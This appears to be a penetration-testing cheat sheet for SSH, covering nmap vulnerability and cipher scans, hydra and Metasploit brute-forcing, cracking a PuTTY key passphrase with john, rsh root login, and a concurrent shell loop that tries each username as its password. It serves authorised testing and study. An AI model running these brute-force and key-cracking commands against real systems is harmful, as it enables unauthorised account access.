NMAP Commands
# Version detection plus the default NSE scripts against SSH on port 22.
nmap -sCV -p22 10.10.10.10
# nmap vuln scan: default scripts plus the vuln and vulners script sets, host discovery skipped (-Pn).
# NOTE(review): vulners is understood to look versions up against an external vulnerability database — confirm that outbound lookup is acceptable for the engagement before running it.
nmap -sC --script vuln,vulners -Pn -p22 10.10.10.10
# nmap algorithm enumeration: SYN scan with version detection, listing the algorithms (key exchange, host key, ciphers, MACs) the server offers.
# Per these notes, CBC-mode ciphers or HMAC MACs in the offered lists indicate a weak configuration (called "vulnerable" here) — report it as a weak-algorithm finding.
nmap -Pn -sS -sV -p 22 --script ssh2-enum-algos 10.10.10.10
Brute Forcing
# Online password guessing against SSH with hydra: the first form takes a username list (-L) and password list (-P),
# the second a single username (-l) and a non-default port (-s).
# VICTIM_IP, username, port and the list file names are placeholders to be replaced.
hydra -L userx.txt -P wordlist.txt -v VICTIM_IP ssh
hydra -l username -P password_file.txt -s port ssh
Enumeration via Metasploit
#User enumeration --> works only on a few old versions
use auxiliary/scanner/ssh/ssh_enumusers
#Version Detection
use auxiliary/scanner/ssh/ssh_version
#Brute-forcing SSH
use auxiliary/scanner/ssh/ssh_login
#FTP Bruteforce
use auxiliary/scanner/ftp/ftp_login
Cracking an SSH Private Key (.ppk)
# Recover an OpenSSH private key from a PuTTY .ppk file.
sudo apt install putty-tools
# Convert the .ppk to OpenSSH format (id_rsa) for ssh login.
# If puttygen prompts for a passphrase, the key is encrypted and the passphrase has to be cracked first (next two lines).
puttygen private.ppk -O private-openssh -o id_rsa
# Extract a john-compatible hash from the .ppk and run john against it with a wordlist.
putty2john private.ppk > hash
john --format=PuTTY --fork=4 hash -w=wordlist.txt
# Re-run the conversion and enter the cracked passphrase when prompted.
puttygen private.ppk -O private-openssh -o id_rsa
RSH - Port 514
Predecessor of SSH; passwords are not used;
- Either use a private key or allow access based on trusted hosts..
- Deprecated
# Legacy remote-shell (rsh, TCP 514) login as root; per the notes above, access is granted by host-based trust rather than a password.
rsh root@10.10.10.10
OLD SSH Ciphers
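# Connect to a server that only offers legacy host-key algorithms: re-enable ssh-dss on the client side.
ssh -oHostKeyAlgorithms=+ssh-dss root@10.10.10.10
# Client error that indicates the workaround above is needed:
#   no matching host key type found. Their offer: ssh-rsa,ssh-dss
# Variant that also forces the legacy DH group14 / SHA-1 key exchange, presumably for servers where the KEX negotiation fails as well.
# Fix: the original line ended in a stray "|", which would have piped ssh's output into whatever command followed.
ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss root@10.10.10.10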
# Brute-forcing SSH using old ciphers: for every username in the wordlist, try it as its own password via sshpass,
# with the legacy KexAlgorithms/HostKeyAlgorithms options from above.
# Each attempt is launched in the background (&) and the loop never waits on them, so all attempts run concurrently
# and no exit status is checked.
for username in $(cat /usr/share/wordlists/ssh_usernames.txt); do sshpass -p $username ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss $username@10.10.10.10 & done